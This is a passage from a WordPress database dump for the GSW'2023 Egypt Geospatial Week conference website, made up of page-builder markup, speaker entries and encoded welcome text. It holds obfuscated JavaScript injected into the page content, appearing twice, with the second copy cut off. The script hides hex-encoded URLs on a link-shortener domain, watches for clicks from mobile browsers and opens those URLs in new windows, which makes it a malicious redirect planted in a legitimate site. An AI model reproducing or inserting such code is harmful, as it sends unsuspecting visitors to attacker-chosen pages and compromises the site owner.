css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-19 16:24:27','2022-10-19 16:24:27','',2167,'https://gsw2023.com/?p=2909',0,'revision','',0),
(2910,1,'2022-10-19 16:25:27','2022-10-19 16:25:27','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 